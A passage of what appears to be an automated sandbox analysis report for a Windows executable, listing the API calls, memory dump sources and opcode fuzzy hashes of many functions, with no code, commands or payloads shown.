                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
                                                              • Instruction ID: f0a7ff0d7d600fd555ed5b1143d5821445c7a1fb189b57daf83ba3f82d615951
                                                              • Opcode Fuzzy Hash: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
                                                              • Instruction Fuzzy Hash: 9EE092315001289BDB20BB68CC05BD97B58FB183E1F044261FD44E31D0D770DE45CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0089DEEC
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0089DF03
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
                                                              • Instruction ID: c2391e393572009512b021594c4abb8b6304708fddf4cbe2bc5e334d57ee2355
                                                              • Opcode Fuzzy Hash: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
                                                              • Instruction Fuzzy Hash: 98E09B72404248A6DF01B764DC06F9F3B6CBB15785F040451B640DB0A2D974DA108766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
                                                              • Instruction ID: 7bd03da0e7c84895e1994dbab085862c834600add39f67f6edda2913994ec653
                                                              • Opcode Fuzzy Hash: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
                                                              • Instruction Fuzzy Hash: 72E04876504118BBDF11B794DC05FDA7BACFF093D1F0400657645E2104DA74DA84CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0089A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
                                                              • Instruction ID: 206e326ee75c50847ef7a0edef576adfca72f97ac56ef8f5e6d96f60239a0681
                                                              • Opcode Fuzzy Hash: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
                                                              • Instruction Fuzzy Hash: 06E0ED71500218EBCB14EF99C5417A9BBE8FB04364F24C05AA846E3301E774AE04DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008A2BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
                                                              • Instruction ID: 0fa7643553d242cde732b7cd3eaa09174968f641aeb8551d4cf18846377d1123
                                                              • Opcode Fuzzy Hash: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
                                                              • Instruction Fuzzy Hash: 50D0A934294214DB7C347A7C29025882349FE53B747A053CAF431D5DC1EE189042A032
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
                                                              • Instruction ID: 355139224975fc97c531ae3b6ff7ada7ecb77dc992a3c37ee2e9649771753714
                                                              • Opcode Fuzzy Hash: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
                                                              • Instruction Fuzzy Hash: 71C0123205C280BECB020BB4DC0DC2BBBA8BBA5312F04C90CB0B5C2060C238CA10DB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
                                                              • Instruction ID: e8bd0d1a5e14cb3672a960d7c5fdefcf2dca8f952a5812d27c87ac5d958d6d92
                                                              • Opcode Fuzzy Hash: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
                                                              • Instruction Fuzzy Hash: 5BC18070A002549FEF15EF68C498BA97BAAFF15320F0805B9EC45DB396DF309946CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
                                                              • Instruction ID: aacbf592e65901a2934b6a4e72866bb4481f6bd8df9249414931b48d163deba1
                                                              • Opcode Fuzzy Hash: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
                                                              • Instruction Fuzzy Hash: C871C071540F449EDB35EB74C8459E7B7E9FB14700F40092EE2ABC7642DA326A88DF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00888289
                                                                • Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
                                                              • Instruction ID: 340d058e70b1f4bd7150e4b3aa8172507329068448bb8d62d086b1da485c046d
                                                              • Opcode Fuzzy Hash: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
                                                              • Instruction Fuzzy Hash: CA4195719446589ADB24FBA4CC55AEAB368FF10304F4404EAE18AE7183EF755E85CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C
                                                                • Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
                                                              • Instruction ID: 005fb82f1e741aad7c4fe1e15f16d7485f74b228de14834446924e9b60a956ca
                                                              • Opcode Fuzzy Hash: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
                                                              • Instruction Fuzzy Hash: 224149B0905B409EE724DF798885AE6FBE5FF18310F54492ED5EEC3282CB316654CB15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C
                                                                • Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
                                                              • Instruction ID: f4f997a682e335aff79cf6bb3783ec1d0fe939b916b0cb24b4429cfa4101f4e5
                                                              • Opcode Fuzzy Hash: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
                                                              • Instruction Fuzzy Hash: 234136B0905B409EEB24EF798885AE6FBE5FF19310F54492ED5EEC3282CB316654CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089B098
                                                                • Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
                                                              • Instruction ID: 4d833bacea639e693aa63534bcd8cd73df88babdf9e9dc403714a45aeff15654
                                                              • Opcode Fuzzy Hash: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
                                                              • Instruction Fuzzy Hash: 11318A71800249EACF15EFA8D9519EEBBB8FF19304F14449AE409F3242DB35AE058B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,008B3A34), ref: 008AACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
                                                              • Instruction ID: b9939f708dc3347890fd34d70bf9dcf5f52a003e2133ab4aa724d841b1bc40f7
                                                              • Opcode Fuzzy Hash: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
                                                              • Instruction Fuzzy Hash: 6511A333A006296FBB3A9E2CEC449AA7395FB863747164220ED55EBE54DB34DC01C7D2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
                                                              • Instruction ID: 381004aa9ac06037743ef541c4a9ab6b0eb165db203c31a62be639fe0d6f4d66
                                                              • Opcode Fuzzy Hash: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
                                                              • Instruction Fuzzy Hash: C2015233900528ABCF11BBACCC859EEB736FF88750B054625E866F7252DB348D0587A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AB136: RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177
                                                              • _free.LIBCMT ref: 008AC4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: aadb5758a45ea9d5355617f579e8c0534d5a4709d0e09fafeba7a68a6f294ae8
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: F70126722043056BF3318E69888196AFBE8FB8A370F25051DE184C3681EA30A805C738
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
                                                              • Instruction ID: f080c40e0588083ab87ae9a5aba92a1708fc8ac0b92144c9b8e6f7bd837a3542
                                                              • Opcode Fuzzy Hash: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
                                                              • Instruction Fuzzy Hash: E7F08932505569B7FB255A65AC25B5F7748FF43770B188221FC08EB992CB30DD0186E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008A3C3F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
